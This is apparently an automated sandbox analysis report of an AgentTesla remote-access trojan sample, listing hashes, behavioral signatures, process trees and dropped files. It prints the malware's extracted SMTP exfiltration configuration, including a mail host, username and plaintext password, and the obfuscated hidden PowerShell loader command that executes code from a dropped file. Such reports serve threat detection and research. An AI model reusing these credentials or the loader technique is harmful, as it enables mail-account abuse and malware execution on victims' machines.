Analysis
-
max time kernel
150s -
max time network
155s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
29-03-2024 01:34
Static task
static1
Behavioral task
behavioral1
Sample
027545e09f397707e98abf5c192c35e5b01a51a74edc2070b9f950140b5c3ef2.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
027545e09f397707e98abf5c192c35e5b01a51a74edc2070b9f950140b5c3ef2.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral3
Sample
$PLUGINSDIR/nsExec.dll
Resource
win7-20240221-en
Behavioral task
behavioral4
Sample
$PLUGINSDIR/nsExec.dll
Resource
win10v2004-20240226-en
Behavioral task
behavioral5
Sample
Overstretch/Automobilfirmaers/Natchezan/Outreckon.ps1
Resource
win7-20240221-en
Behavioral task
behavioral6
Sample
Overstretch/Automobilfirmaers/Natchezan/Outreckon.ps1
Resource
win10v2004-20240226-en
General
-
Target
027545e09f397707e98abf5c192c35e5b01a51a74edc2070b9f950140b5c3ef2.exe
-
Size
555KB
-
MD5
99b3c84d119b8d3173aa52f40871a090
-
SHA1
029c6d4d7f5509bed4fe65e2ee961c058d896a61
-
SHA256
027545e09f397707e98abf5c192c35e5b01a51a74edc2070b9f950140b5c3ef2
-
SHA512
f7e1bd7e12d6e34deb0c40bd4bdc4b69c6fc7d43feb8671212eb8ac588a3d1e26922be5edb7d28997b088f5e3bbea72b61e98cb160c7288f18e0b1ae10302448
-
SSDEEP
12288:ZCcSi/icxi33VLqAdQqW8sHPS9ojrO+HTG07rS:ZoiKainVPdQBSuGyG0K
Malware Config
Extracted
Protocol: smtp- Host:
mail.legodimo.co.za - Port:
587 - Username:
[email protected] - Password:
IFfo%142#
Extracted
agenttesla
Protocol: smtp- Host:
mail.legodimo.co.za - Port:
587 - Username:
[email protected] - Password:
IFfo%142# - Email To:
[email protected]
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Loads dropped DLL 1 IoCs
Processes:
027545e09f397707e98abf5c192c35e5b01a51a74edc2070b9f950140b5c3ef2.exepid process 2828 027545e09f397707e98abf5c192c35e5b01a51a74edc2070b9f950140b5c3ef2.exe -
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 51 api.ipify.org 52 api.ipify.org 53 ip-api.com -
Drops file in System32 directory 2 IoCs
Processes:
027545e09f397707e98abf5c192c35e5b01a51a74edc2070b9f950140b5c3ef2.exedescription ioc process File opened for modification C:\Windows\SysWOW64\orthopteran\inornateness.mel 027545e09f397707e98abf5c192c35e5b01a51a74edc2070b9f950140b5c3ef2.exe File opened for modification C:\Windows\SysWOW64\nordbrandts\bogbussens.pro 027545e09f397707e98abf5c192c35e5b01a51a74edc2070b9f950140b5c3ef2.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
Processes:
wab.exepid process 3744 wab.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
powershell.exewab.exepid process 1108 powershell.exe 3744 wab.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 1108 set thread context of 3744 1108 powershell.exe wab.exe -
Drops file in Program Files directory 3 IoCs
Processes:
027545e09f397707e98abf5c192c35e5b01a51a74edc2070b9f950140b5c3ef2.exedescription ioc process File opened for modification C:\Program Files (x86)\Common Files\Lysbade6\omringe.ber 027545e09f397707e98abf5c192c35e5b01a51a74edc2070b9f950140b5c3ef2.exe File opened for modification C:\Program Files (x86)\Common Files\egilds.Har 027545e09f397707e98abf5c192c35e5b01a51a74edc2070b9f950140b5c3ef2.exe File created C:\Program Files (x86)\opalesces\Redheadedness.lnk 027545e09f397707e98abf5c192c35e5b01a51a74edc2070b9f950140b5c3ef2.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 11 IoCs
Processes:
powershell.exewab.exepid process 1108 powershell.exe 1108 powershell.exe 1108 powershell.exe 1108 powershell.exe 1108 powershell.exe 1108 powershell.exe 1108 powershell.exe 1108 powershell.exe 1108 powershell.exe 3744 wab.exe 3744 wab.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
powershell.exepid process 1108 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exewab.exedescription pid process Token: SeDebugPrivilege 1108 powershell.exe Token: SeDebugPrivilege 3744 wab.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
wab.exepid process 3744 wab.exe -
Suspicious use of WriteProcessMemory 11 IoCs
Processes:
027545e09f397707e98abf5c192c35e5b01a51a74edc2070b9f950140b5c3ef2.exepowershell.exedescription pid process target process PID 2828 wrote to memory of 1108 2828 027545e09f397707e98abf5c192c35e5b01a51a74edc2070b9f950140b5c3ef2.exe powershell.exe PID 2828 wrote to memory of 1108 2828 027545e09f397707e98abf5c192c35e5b01a51a74edc2070b9f950140b5c3ef2.exe powershell.exe PID 2828 wrote to memory of 1108 2828 027545e09f397707e98abf5c192c35e5b01a51a74edc2070b9f950140b5c3ef2.exe powershell.exe PID 1108 wrote to memory of 2916 1108 powershell.exe cmd.exe PID 1108 wrote to memory of 2916 1108 powershell.exe cmd.exe PID 1108 wrote to memory of 2916 1108 powershell.exe cmd.exe PID 1108 wrote to memory of 3744 1108 powershell.exe wab.exe PID 1108 wrote to memory of 3744 1108 powershell.exe wab.exe PID 1108 wrote to memory of 3744 1108 powershell.exe wab.exe PID 1108 wrote to memory of 3744 1108 powershell.exe wab.exe PID 1108 wrote to memory of 3744 1108 powershell.exe wab.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\027545e09f397707e98abf5c192c35e5b01a51a74edc2070b9f950140b5c3ef2.exe"C:\Users\Admin\AppData\Local\Temp\027545e09f397707e98abf5c192c35e5b01a51a74edc2070b9f950140b5c3ef2.exe"1⤵
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$Fikserbart=Get-Content 'C:\Users\Admin\AppData\Roaming\kraftfuldheders\Fide231\recited\Overstretch\Automobilfirmaers\Natchezan\Outreckon.Sty';$Stormlbs=$Fikserbart.SubString(56995,3);.$Stormlbs($Fikserbart)"2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "set /A 1^^0"3⤵
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"3⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qthegpuy.op0.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\nsc6591.tmp\nsExec.dllFilesize
6KB
MD551e63a9c5d6d230ef1c421b2eccd45dc
SHA1c499cdad5c613d71ed3f7e93360f1bbc5748c45d
SHA256cd8496a3802378391ec425dec424a14f5d30e242f192ec4eb022d767f9a2480f
SHA512c23d713c3c834b3397c2a199490aed28f28d21f5781205c24df5e1e32365985c8a55be58f06979df09222740ffa51f4da764ebc3d912cd0c9d56ab6a33cab522
-
C:\Users\Admin\AppData\Roaming\kraftfuldheders\Fide231\recited\Overstretch\Automobilfirmaers\Natchezan\Outreckon.StyFilesize
55KB
MD585bee3407dc99a55d809e31f5b8822f3
SHA1898e5873998c61dc48e6a01e43ba667f9a70f571
SHA2562afd7f567beb13e65577a1d2ee4d6a161c4a1b01cb154c7129846d7ed74ad0c0
SHA51206140520fedab28d7a982dc0d1563aed53b59a943131ed58cff405620c412e63f9dd7019661677bd562bd8813a09613b0e1f44752b983e953eef891af4941587
-
C:\Users\Admin\AppData\Roaming\kraftfuldheders\Fide231\recited\Overstretch\Automobilfirmaers\Natchezan\Venturesomely.Skr150Filesize
347KB
MD5e009275e95a08217120b862807376e4b
SHA1f380d5f6af82197cc12325a938a5f1dff77da6cf
SHA25623036d41bf9f2c118904568b4091253199c3d938105fb5d766dd51ffb58bd51d
SHA51268eacd7988116c384cb8aa6bcf5023b3ff578c2756428b766d59819a356daeca8fa4f8395b4612cbe7f19257d96f8630e4ef0c366ff30d7762276c030fa7f59b
-
memory/1108-38-0x0000000006570000-0x000000000658E000-memory.dmpFilesize
120KB
-
memory/1108-21-0x0000000002F70000-0x0000000002FA6000-memory.dmpFilesize
216KB
-
memory/1108-26-0x0000000005650000-0x00000000056B6000-memory.dmpFilesize
408KB
-
memory/1108-27-0x0000000005F40000-0x0000000005FA6000-memory.dmpFilesize
408KB
-
memory/1108-24-0x0000000005760000-0x0000000005D88000-memory.dmpFilesize
6.2MB
-
memory/1108-37-0x00000000060B0000-0x0000000006404000-memory.dmpFilesize
3.3MB
-
memory/1108-23-0x0000000003040000-0x0000000003050000-memory.dmpFilesize
64KB
-
memory/1108-39-0x0000000006620000-0x000000000666C000-memory.dmpFilesize
304KB
-
memory/1108-51-0x0000000073A10000-0x00000000741C0000-memory.dmpFilesize
7.7MB
-
memory/1108-41-0x0000000007620000-0x00000000076B6000-memory.dmpFilesize
600KB
-
memory/1108-42-0x0000000006AA0000-0x0000000006ABA000-memory.dmpFilesize
104KB
-
memory/1108-43-0x0000000006AC0000-0x0000000006AE2000-memory.dmpFilesize
136KB
-
memory/1108-44-0x0000000007C70000-0x0000000008214000-memory.dmpFilesize
5.6MB
-
memory/1108-67-0x0000000073A10000-0x00000000741C0000-memory.dmpFilesize
7.7MB
-
memory/1108-46-0x00000000088A0000-0x0000000008F1A000-memory.dmpFilesize
6.5MB
-
memory/1108-48-0x0000000003040000-0x0000000003050000-memory.dmpFilesize
64KB
-
memory/1108-22-0x0000000073A10000-0x00000000741C0000-memory.dmpFilesize
7.7MB
-
memory/1108-50-0x0000000007A90000-0x0000000007A94000-memory.dmpFilesize
16KB
-
memory/1108-40-0x0000000003040000-0x0000000003050000-memory.dmpFilesize
64KB
-
memory/1108-25-0x00000000055B0000-0x00000000055D2000-memory.dmpFilesize
136KB
-
memory/1108-52-0x0000000003040000-0x0000000003050000-memory.dmpFilesize
64KB
-
memory/1108-55-0x0000000003040000-0x0000000003050000-memory.dmpFilesize
64KB
-
memory/1108-56-0x0000000003040000-0x0000000003050000-memory.dmpFilesize
64KB
-
memory/1108-57-0x0000000008F20000-0x000000000D220000-memory.dmpFilesize
67.0MB
-
memory/1108-58-0x00000000777A1000-0x00000000778C1000-memory.dmpFilesize
1.1MB
-
memory/1108-53-0x0000000003040000-0x0000000003050000-memory.dmpFilesize
64KB
-
memory/3744-76-0x0000000073A10000-0x00000000741C0000-memory.dmpFilesize
7.7MB
-
memory/3744-64-0x0000000000C30000-0x0000000001E84000-memory.dmpFilesize
18.3MB
-
memory/3744-66-0x0000000000C30000-0x0000000000C72000-memory.dmpFilesize
264KB
-
memory/3744-60-0x00000000777A1000-0x00000000778C1000-memory.dmpFilesize
1.1MB
-
memory/3744-68-0x0000000073A10000-0x00000000741C0000-memory.dmpFilesize
7.7MB
-
memory/3744-69-0x0000000023C90000-0x0000000023CA0000-memory.dmpFilesize
64KB
-
memory/3744-70-0x00000000249F0000-0x0000000024A82000-memory.dmpFilesize
584KB
-
memory/3744-71-0x00000000249A0000-0x00000000249F0000-memory.dmpFilesize
320KB
-
memory/3744-72-0x0000000024B40000-0x0000000024BDC000-memory.dmpFilesize
624KB
-
memory/3744-73-0x0000000024AD0000-0x0000000024ADA000-memory.dmpFilesize
40KB
-
memory/3744-59-0x0000000077828000-0x0000000077829000-memory.dmpFilesize
4KB
-
memory/3744-77-0x0000000023C90000-0x0000000023CA0000-memory.dmpFilesize
64KB